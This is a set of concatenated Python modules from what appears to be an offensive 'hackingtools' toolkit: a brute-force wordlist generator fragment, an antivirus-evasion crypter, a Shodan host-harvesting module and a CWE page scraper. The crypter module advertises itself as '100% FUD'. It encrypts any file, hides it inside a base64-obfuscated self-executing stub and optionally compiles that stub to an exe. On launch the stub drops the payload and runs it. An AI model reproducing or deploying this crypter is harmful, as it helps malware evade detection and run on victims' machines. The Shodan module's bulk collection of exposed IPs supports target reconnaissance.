                alphabets_patter.append(char)

        final_combinations = []
        for i_alp, alp in enumerate(alphabets_patter):
            if i_alp == 0:
                for comb in getCombinationPosibilitiesLength(alphabet=alp, length=create_pattern[i_alp], generator=generator):
                    final_combinations.append(comb)
            else:
                temp_final_combinations = final_combinations
                final_combinations = []
                for combb in getCombinationPosibilitiesLength(alphabet=alp, length=create_pattern[i_alp], generator=generator):
                    for comb in [r[0] + r[1] for r in product(temp_final_combinations, combb)]:
                        final_combinations.append(comb)

        if generator:
            for f in final_combinations:
                yield f
        else:
            return final_combinations

    except MemoryError:
        Logger.printMessage(message='Memory Error', description='There are so many combinations for this pattern', is_error=True)
    return []

def getDict(length=8, alphabet='lalpha', try_pattern=None, generator=False):
    if try_pattern and not try_pattern == '':
        if generator:
            for comb in getCombinationPosibilitiesByPattern(try_pattern=try_pattern, generator=generator):
                yield comb
        else:
            return getCombinationPosibilitiesByPattern(try_pattern=try_pattern, generator=generator)
    else:
        if generator:
            for comb in getCombinationPosibilitiesLength(alphabet=alphabet, length=length, generator=generator):
                yield comb
        else:
            return getCombinationPosibilitiesLength(alphabet=alphabet, length=length, generator=generator)

def getPosibleAlphabet():
    return list(__config_utils__.keys())

def get_from_dict(data_dict, map_list, default=None):
    def getitem(source, key):
        try:
            if isinstance(source, list):
                return source[int(key)]
            if isinstance(source, dict) and key not in source.keys():
                return default
            if not source:
                return default
        except IndexError:
            return default

        return source[key]

    if isinstance(map_list, str):
        map_list = map_list.split('.')

    return reduce(getitem, map_list, data_dict)

def groupListByLength(dataList, length):
    return [ dataList[i:i+length] for i in range(0, len(dataList), length) ]


# === Crypts any file using ht_rsa module and some Utils. For now, is FUD 100% ===

"""
With this module, we can crypt any file we want 
for not been detected, for example, by antiviruses.
Currently it support's the following 2 public functions and 4 private functions:

Public:

1. **crypt_file** - Crypts any file with ht_rsa functions and some utils and returns crypted file 100% FUD (jump to section in [[ht_crypter.py#crypt_file]] )

2. **createStub** - Creates a file with the stub (decrypt functions and pk for rsa) included into the file for been 100% FUD (jump to section in [[ht_crypter.py#createStub]] )

#TODO MORE HEREEE

"""

from hackingtools.core import Logger, Config, Utils
import hackingtools as ht 

import sys
import os.path
import math
import base64
import shutil

config = Config.getConfig(parentKey='modules', key='ht_crypter')
output_dir = os.path.abspath(os.path.join(os.path.dirname(__file__), 'output'))

class StartModule():

# === __init__ ===
	def __init__(self):
		Utils.emptyDirectory(output_dir)
		self._main_gui_func_ = 'crypt_file'

# === help ===
	def help(self):
		Logger.printMessage(message=ht.getFunctionsNamesFromModule('ht_crypter'), debug_module=True)

# === convertToExe ===
	def convertToExe(self, stub_name):
		"""
		Convert's given Python file path in String into a new one with the same name and .exe as extension
		Compile's with pyinstaller and could be change it's params in config.json
		
		Arguments
		---------
			stub_name : str
				
				File path to convert to exe
		"""
		Logger.printMessage(message='{methodName}'.format(methodName='convertToExe'), description='{stub_name}'.format(stub_name=stub_name), debug_module=True)
		# Convert py to exe with pyinstaller
		import os
		os.system(config['pyinstaller'].format(path=os.path.dirname(stub_name)) + " " + stub_name)
		filename = '{file}.exe'.format(file=stub_name.split('.')[0].split('\\')[-1])

		file_to_move = os.path.abspath(os.path.join('dist', '{file}'.format(file=filename)))
		new_file = os.path.abspath(os.path.join(os.path.dirname(stub_name), filename))

		if os.path.isfile(file_to_move) and not os.path.isfile(new_file):
			os.rename(file_to_move, new_file)

		new_spec_file = '{name}.spec'.format(name=new_file.split('.')[0])
		if os.path.isfile(new_spec_file):
			os.remove(new_spec_file)

		build_dir = os.path.abspath(os.path.join('build', '{file}'.format(file=filename.split('.')[0])))
		if os.path.isdir(build_dir):
			shutil.rmtree(build_dir)

		if os.path.isfile(file_to_move):
			os.remove(file_to_move)

		spec_file = os.path.abspath('{file}.spec'.format(file=filename.split('.')[0]))
		if os.path.isfile(spec_file):
			os.remove(spec_file)

# === createStub ===
	def createStub(self, crypto_data_hex, public_key, drop_file_name, save_name, is_iterating=False, is_last=False, convert=False):
		"""
		Create's the stub for the crypter and 
		has some courious params he have to see
		
		Arguments
		---------
			crypto_data_hex : str

				File path that want to crypt
			public_key : str
			
				New File name for crypted file when 
				return's it
			drop_file_name : str
				New File name for crypted file when 
				return's it
			save_name : str
				New File name for crypted file when 
				return's it
		
		Keyword Arguments:
			is_iterating : bool
			
				Compile's the final file if we select 
				it (default: {False})
			is_last : bool
			
				Internal variable for looping on the 
				crypting (default: {False})
			convert : bool
				
				Internal varuable for looping on the 
				crypting (default: {1})
		
		Returns
		-------
			str
			
				Crypted file path name / None
		"""
		stub = ''
		if is_last:
			stub = "import argparse, math, base64, binascii, random, sys, subprocess, os\nfrom random import randint\n"
			stub += "cdx = \"" + crypto_data_hex + "\"\n"
			stub += "drpnm = \"" + drop_file_name + "\"\n"
			stub += "pk = ({a}, {b})\n".format(a=public_key[0], b=public_key[1])
			stub += """
def dcy(pk, cptx):
	k, n = pk
	mensajeRecibido = __reBa64__(cptx.encode('utf-8'))
	mensajeHexRecibido = __ba64Hex__(mensajeRecibido)
	mensajeDecimalRecibido = __hexDec__(mensajeHexRecibido)
	mensajeDescifrado = [((c ** k) % n) for c in mensajeDecimalRecibido]
	mensaje_de_ascii = __deAS__(mensajeDescifrado)
	decasc = __reBa64__(''.join(mensaje_de_ascii).encode())
	hexba64 = __ba64Hex__(decasc)
	ashex = __hexDec__(hexba64)
	deasc = __deAS__(ashex)
	ba64 = base64.b64decode(deasc.encode())
	return ba64
def __reBa64__(m):
	mBa64 = [m[i:i+4] for i in range(0, len(m), 4)]
	return mBa64
def __ba64Hex__(m):
	mHx = [base64.b64decode(b64) for b64 in m]
	return mHx
def __hexDec__(m):
	mDec = [int(hexa.decode("UTF-8"), 16) for hexa in m]
	return mDec
def __deAS__(m):
	m1 = ''.join([chr(d) for d in m])
	return m1
def __meAS__(m):
	men = [ord(p) for p in m]
	return men
dcy_data = dcy(pk=pk, cptx=cdx)
"""
		if is_iterating:
			stub += "cdx = \"" + crypto_data_hex + "\"\n"
			stub += "pk = ({a}, {b})\n".format(a=public_key[0], b=public_key[1])
			stub += "dcy_data = dcy(pk=pk, cptx=cdx)\n"
			stub += "exec(dcy_data)"
		else:
			stub += """
image_extensions = ('jpg', 'jpeg', 'bpm', 'ico', 'png')
exec_extensions = ('bat', 'exe', 'vbs', 'ps1')
python_extensions = ('py')
nf = open(drpnm, 'wb')
try:
	nf.write(dcy_data)
except:
	pass
nf.close()
if os.path.exists(drpnm):
	if drpnm.split('.')[1] in image_extensions:
		imageViewerFromCommandLine = {'linux':'xdg-open', 'win32':'explorer', 'darwin':'open'}[sys.platform]
		subprocess.run([imageViewerFromCommandLine, drpnm], close_fds=True)
	if drpnm.split('.')[1] in exec_extensions and sys.platform == 'win32':
		os.system(drpnm)
	if drpnm.split('.')[1] in python_extensions:
		exec(dcy_data)
		#proc = subprocess.Popen('python {fn}'.format(fn=drpnm), shell=True, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
"""

		stub_base64 = base64.b64encode(stub.encode('utf-8'))
		stub = "import base64\n"
		stub += "data = {st_ba64}\n".format(st_ba64=stub_base64)
		stub += "exec(base64.b64decode(data))"
		
		Utils.saveToFile(content=stub, fileName=save_name)

		if convert:
			self.convertToExe(save_name)

# === crypt_file ===
	def crypt_file(self, filename, new_file_name, drop_file_name='dropped.py', prime_length=4, compile_exe=False, is_iterating=False, iterate_count=1, is_last=False):
		"""Crypt's a file when some params we have to use
		
		Arguments
		---------
			filename : str
			
				File path that want to crypt
			new_file_name : str
			
				New File name for crypted file 
				when return's it
		
		Keyword Arguments
		-----------------
			drop_file_name : str
			
				Drop a new file on execute the 
				cryted file (default: {'dropped.py'})
			prime_length : int
			
				Set a prime length for auto-generating
				 the primes for the cryptography 
				 (default: {4})
			compile_exe : bool
			
				Compile's the final file if 
				we select it (default: {False})
			is_iterating : bool
			
				Internal variable for looping 
				on the crypting (default: {False})
			iterate_count : int
			
				Internal variable for looping 
				on the crypting (default: {1})
			is_last : bool
			
				Internal variable for looping 
				on the crypting (default: {False})
		
		Returns
		-------
			str

				Crypted file path name / None
		"""
		Logger.printMessage(message='{methodName}'.format(methodName='crypt_file'), description='{filename}'.format(filename=filename), debug_module=True)
		temp_filename = filename
		if iterate_count > 1:
			temp_filename = filename
			for i in range(1, iterate_count):
				if i == iterate_count - 1:
					is_last = True
				temp_filename = self.crypt_file(filename=temp_filename, new_file_name=new_file_name, drop_file_name=drop_file_name, compile_exe=False, is_iterating=True, iterate_count=1, is_last=is_last)
		
		filename = temp_filename
		if filename and new_file_name:
			crypter_rsa = ht.getModule('ht_rsa')
			data = Utils.getFileContentInByteArray(filePath=filename)
			prime_a, prime_b = crypter_rsa.getRandomKeypair(prime_length)
			public, private = crypter_rsa.generate_keypair(prime_a, prime_b)
			crypted_data = crypter_rsa.encrypt(private_key=private, plaintext=data)
			new_file = new_file_name
			if not '.' in new_file:
				new_file = '{file}.py'.format(file=new_file)

			if compile_exe:
				self.createStub(crypto_data_hex=crypted_data, public_key=public, drop_file_name=drop_file_name, save_name=new_file, is_iterating=is_iterating, is_last=is_last, convert=True)
				new_file = '{file}.exe'.format(file=new_file.split('.')[0])
			else:
				self.createStub(crypto_data_hex=crypted_data, public_key=public, drop_file_name=drop_file_name, save_name=new_file, is_iterating=is_iterating, is_last=is_last)
			return new_file
		else:
			return None


from shodan import Shodan 
import requests
import json
import hackingtools as ht
from hackingtools.core import Logger, Config
import time
from colorama import init, Fore
import os
import datetime

config = Config.getConfig(parentKey='modules', key='ht_shodan')
output_dir = os.path.abspath(os.path.join(os.path.dirname(__file__), 'output'))

class StartModule():

    def __init__(self):
        self._main_gui_func_ = 'search_host'

    def help(self):
        Logger.printMessage(message=ht.getFunctionsNamesFromModule('ht_shodan'), debug_module=True) 

    def __getShodanByAPI__(self, shodan_api='', session_id=None):
        if not shodan_api:
            return Shodan(ht.Config.getAPIKey('shodan_api', session_id))
        return Shodan(shodan_api)

    def getIPListfromServices(self, serviceName, shodan_api=None):
        Logger.printMessage(message='{methodName}'.format(methodName='getIPListfromServices'), description='{param}'.format(param=serviceName), debug_module=True)

        searcher = self.__getShodanByAPI__(shodan_api)

        if searcher:
            try:
                result = searcher.search(serviceName)
                dict_obj = []
                for res in result['matches']:
                    dict_obj.append(res['ip_str'].encode('utf-8').decode('utf-8'))
                return dict_obj
            except:
                return []
        else:
            return []

    def queryShodan(self, category='', osintDays=100, shodan_api=None):
        try:
            Logger.printMessage(message='{methodName}'.format(methodName='queryShodan'), debug_module=True)

            days_back = int(osintDays) + 1
            limit_date = (datetime.date.today() - datetime.timedelta(days=days_back)).strftime(config['search_limit_date_format'])
            search_term = 'category:{category} after:{time}'.format(category=category, time=limit_date)

            searcher = self.__getShodanByAPI__(shodan_api)

            if searcher:
                results = searcher.search(search_term, page=1)

                Logger.printMessage(message='{message_result}: {res}'.format(message_result=config['msg_result_found'], res=results['total']), debug_module=True)

                pages = results['total']/100

                if results['total']%100 > 0:
                    pages += 1

                    ip_list = []

                    for n in range(1, pages+1):
                        if n > 1:
                            results = searcher.search(search_term, page=n)

                        Logger.printMessage(message='{msg_fetch_page} {num} of {pages}...'.format(msg_fetch_page=config['msg_fetch_page'], num=n, pages=pages), debug_module=True)

                        for result in results['matches']:
                            ip_list.append(result['ip_str'])

                    return ip_list

                else:
                    return []
        except Exception as e:
            Logger.printMessage(message='{error}: {error_msg}'.format(error=config['error'], error_msg=e), debug_module=True)
            return []

        except Exception as e:
            Logger.printMessage(message='{error}: {error_msg}'.format(error=config['error'], error_msg=e), debug_module=True)
            return []

    def search_host(self, ip, shodan_api=None, count_loop_try=0):
        res = {}
        if count_loop_try > 5:
            return res
        try:
            Logger.printMessage(message='{methodName}'.format(methodName='search_host'), description='{param}'.format(param=ip), debug_module=True)

            searcher = self.__getShodanByAPI__(shodan_api)

            if searcher:
                host = searcher.host(ip)

                interesting_data = config['scan_interesting_data_keys']

                for posibe_data in interesting_data:
                    try:
                        if host[posibe_data]:
                            if isinstance(host[posibe_data], dict):
                                if posibe_data in 'data':
                                    res[posibe_data] = {}
                                    res[posibe_data]['port'] = host[posibe_data]['port']
                                    res[posibe_data]['data'] = host[posibe_data]['data']
                                else:
                                    res[posibe_data] = host[posibe_data][0]
                            else:
                                res[posibe_data] = host[posibe_data]
                        elif host.get(posibe_data):
                            res[posibe_data] = host.get(posibe_data)
                    except:
                        try:
                            if host.get(posibe_data):
                                res[posibe_data] = host.get(posibe_data)
                        except:
                            pass

        except Exception as e:
            Logger.printMessage(message='Warning: {0}... Retrying in 0,5 seconds...'.format(e), is_warn=True, debug_module=True)
            time.sleep(0.4)
            return self.search_host(ip, shodan_api, count_loop_try=count_loop_try+1)
        return res

    def getSSLCerts(self, ip, shodan_api=None):
        res = {}
        try:
            searcher = self.__getShodanByAPI__(shodan_api)
            Logger.printMessage(message='{methodName}'.format(methodName='getSSLCerts'), debug_module=True)
            for banner in searcher.stream.ports([443, 8443]):
                if 'ssl' in banner:
                    res['ssl'] = banner['ssl']
        except Exception as e:
            res['ssl'] = None
        return res

    def searchFromConfig(self, search='', keyword='', shodan_api=None):
        if search != '' and keyword != '' and config[search]:
            Logger.printMessage(message='{methodName}'.format(methodName='searchFromConfig', description=search), debug_module=True)
            url = ("https://api.shodan.io/{search}&key={api}".format(search=config[search], api=shodan_api)).format(ip=keyword) # IP because config {ip}
            request = requests.get(url)
            txt = request.text
            return json.loads(txt)
        else:
            Logger.printMessage(message='{methodName}'.format(methodName='searchFromConfig', description='suggestions_cause_bad_search'), debug_module=True)
            sugg_conf = []
            res = {}
            for configuration in config:
                if configuration.startswith('shodan_'):
                    sugg_conf.append(configuration)
            res['search_options'] = sugg_conf
            return res


from hackingtools.core import Logger, Utils, Config
import hackingtools as ht
import os
from requests_html import HTMLSession
import json, time, sys

config = Config.getConfig(parentKey='modules', key='ht_cwe')
output_dir = os.path.abspath(os.path.join(os.path.dirname(__file__), 'output'))

URL = 'https://cwe.mitre.org/data/definitions/{cwe_id}.html'

BAD_CODE = True
ATTACK_CODE = True
GOOD_CODE = True

class StartModule():

	def __init__(self):
		self._main_gui_func_ = 'searchCWE'

	def help(self):
		Logger.printMessage(message=ht.getFunctionsNamesFromModule('ht_cwe'), debug_module=True)

	def searchCWE(self, cwe_id):
		try:
			data = {}
			vuln_name = ''
			vuln_summary = ''
			vuln_extended = ''
			vuln_status = ''
			
			session = HTMLSession()
			r = session.get(url = URL.format(cwe_id=cwe_id))

			if r.status_code == 200:

				if r.html.find('#Contentpane', first=True) and r.html.find('#Contentpane', first=True).find('.noprint', first=True) and r.html.find('#Contentpane', first=True).find('.noprint', first=True).find('h2', first=True):
					vuln_name = r.html.find('#Contentpane', first=True).find('.noprint', first=True).find('h2', first=True).text.split(': ')[1]

				if r.html.find('#Description', first=True):
					vuln_summary = r.html.find('#Description', first=True).text.replace('Description\n', '')

				if r.html.find('#Extended_Description', first=True):
					vuln_extended = r.html.find('#Extended_Description', first=True).text.replace('Extended Description\n', '')

				if r.html.find('.title', first=True) and r.html.find('.title', first=True).find('.status', first=True) and r.html.find('.title', first=True).find('.status', first=True).find('div', first=True):
					status_titlebar = r.html.find('.title', first=True).find('.status', first=True).find('div', first=True).text

				if r.html.find('.title', first=True) and r.html.find('.title', first=True).find('.status', first=True) and r.html.find('.title', first=True).find('.status', first=True).find('div', first=True):
					status_titlebar = r.html.find('.title', first=True).find('.status', first=True).find('div', first=True).text

				if 'Status' in status_titlebar:
					vuln_status = status_titlebar.split('Status: ')[1].split('\n')[0]

				if not 'View ID:' in status_titlebar:
					data["name"] = vuln_name
					data["lang"] = "en"
					if vuln_summary or vuln_extended:
						data["description"] = {}
					if vuln_summary:
						data["description"]["summary"] = vuln_summary
					if vuln_extended:
						try:
							vuln_extended = vuln_extended.replace('“', '"').replace('”', '"')
							data["description"]["extended"] = vuln_extended.encode('utf-8').decode('cp1252')
						except:
							print(vuln_extended)

					if vuln_status:
						data['status'] = vuln_status

					data["idCwe"] = int(cwe_id)

					if 'Category ID:' in status_titlebar:
						data["type"] = "Category"

					elif 'Weakness ID:' in status_titlebar:

						if 'Abstraction: ' in status_titlebar:
							status_titlebar = status_titlebar.split('Abstraction: ')[1].split('\n')[0]
								
							if status_titlebar in ('Base'):
								status_titlebar = 'Weakness'

							if status_titlebar in ('Compound'):
								status_titlebar = 'CompoundElement'

						else:
							status_titlebar = 'Weakness'

						data["type"] = status_titlebar

					elif 'Type:' in status_titlebar:
						data["type"] = status_titlebar.replace('Type: ', '').split('\n')[0]

					else:
						data["type"] = "Weakness"
						
			return data

		except Exception as e:
			return {}

	def searchWeakness(self, cwe_id):
		data = self.searchCWE(cwe_id)

		common_consequences = ''
		applicable_platforms = ''
		codeExamples = ''

		last_language = ''

		if data and 'description' in data and 'extended' in data['description']:
			
			if data['description']['extended']:
				data['otherNotes'] = []
				data['otherNotes'].append(str(data['description']['extended'].replace('“', '"').replace('”', '"').encode('cp1252').decode('utf-8')))

			del data['description']['extended']

			try:
				session = HTMLSession()
				r = session.get(url = URL.format(cwe_id=cwe_id))

				if r and r.status_code and r.status_code == 200:

					if r.html.find('#Common_Consequences', first=True):
						common_consequences = r.html.find('#oc_{cwe}_Common_Consequences'.format(cwe=cwe_id), first=True).find('table', first=True).find('tr')[1].find('td', first=True).text

					if r.html.find('#Applicable_Platforms'.format(cwe=cwe_id), first=True):
						data_applicable = r.html.find('#oc_{cwe}_Applicable_Platforms'.format(cwe=cwe_id), first=True).find('div')[1].text
						if '\nLanguages\n' in data_applicable:
							applicable_platforms = data_applicable.split('\nLanguages\n')[1].split(' (')[0]
						if '\nTechnologies\n' in data_applicable:
							applicable_platforms = data_applicable.split('\nTechnologies\n')[1].split(' (')[0]
					
					if r.html.find('#oc_{cwe}_Demonstrative_Examples'.format(cwe=cwe_id)) and r.html.find('#oc_{cwe}_Demonstrative_Examples'.format(cwe=cwe_id))[0].find('.indent') and r.html.find('#oc_{cwe}_Demonstrative_Examples'.format(cwe=cwe_id))[0].find('.indent')[0].find('#ExampleCode'):
						divs = r.html.find('#oc_{cwe}_Demonstrative_Examples'.format(cwe=cwe_id))[0].find('.indent')[0].find('#ExampleCode')

						if divs:
							data["codeExamples"] = []

						for div in divs:
							if '(bad code)' in div.text and BAD_CODE:
								d = {}
								d["nature"] = 'Bad_Code'
								if 'Example Language:' in div.text:
									d["languages"] = [div.text.split('Example Language: ')[1].split('\n')[0]]
									last_language = d["languages"]
									d["snippet"] = ' '.join(div.text.split('Example Language: ')[1].split('\n')[1:]).replace('\"', '')
								else:
									d["languages"] = last_language
									d["snippet"] = ' '.join(r.html.find('#oc_{cwe}_Demonstrative_Examples'.format(cwe=cwe_id))[0].find('.indent')[0].find('#ExampleCode')[0].find('.top')[0].text.replace('\"', '').split('\n'))
								data["codeExamples"].append(d)
								
							if '(attack code)' in div.text and ATTACK_CODE:
								d = {}
								d["nature"] = 'Attack_Code'
								if 'Example Language:' in div.text:
									d["languages"] = [div.text.split('Example Language: ')[1].split('\n')[0]]
									last_language = d["languages"]
									d["snippet"] = ' '.join(div.text.split('Example Language: ')[1].split('\n')[1:]).replace('\"', '')
								else:
									d["languages"] = last_language
									d["snippet"] = ' '.join(r.html.find('#oc_{cwe}_Demonstrative_Examples'.format(cwe=cwe_id))[0].find('.indent')[0].find('#ExampleCode')[0].find('.top')[0].text.replace('\"', '').split('\n'))
								data["codeExamples"].append(d)
								
							if '(good code)' in div.text and GOOD_CODE:
								d = {}
								d["nature"] = 'Good_Code'
								if 'Example Language:' in div.text:
									d["languages"] = [div.text.split('Example Language: ')[1].split('\n')[0]]
									last_language = d["languages"]
									d["snippet"] = ' '.join(div.text.split('Example Language: ')[1].split('\n')[1:]).replace('\"', '')
								else:
									d["languages"] = last_language
									d["snippet"] = ' '.join(r.html.find('#oc_{cwe}_Demonstrative_Examples'.format(cwe=cwe_id))[0].find('.indent')[0].find('#ExampleCode')[0].find('.top')[0].text.replace('\"', '').split('\n'))
								data["codeExamples"].append(d)
								
					data['references'] = []
					data['relatedAttackPatterns'] = []

					if common_consequences:
						data["commonConsequences"] = []
						scopes = { "scopes" : common_consequences.split('\n') }
						data["commonConsequences"].append(scopes)

					if applicable_platforms:
						data["applicablePlatforms"] = {}
						data["applicablePlatforms"]["languageClasses"] = {}
						data["applicablePlatforms"]["languageClasses"]["description"] = applicable_platforms.replace('Class: ', '')

					if codeExamples:
						data["codeExamples"] = {}

					if 'type' in data:
						data['weaknessAbstraction'] = data['type']
						del data['type']
							
				return data

			except Exception as e:
				return {}

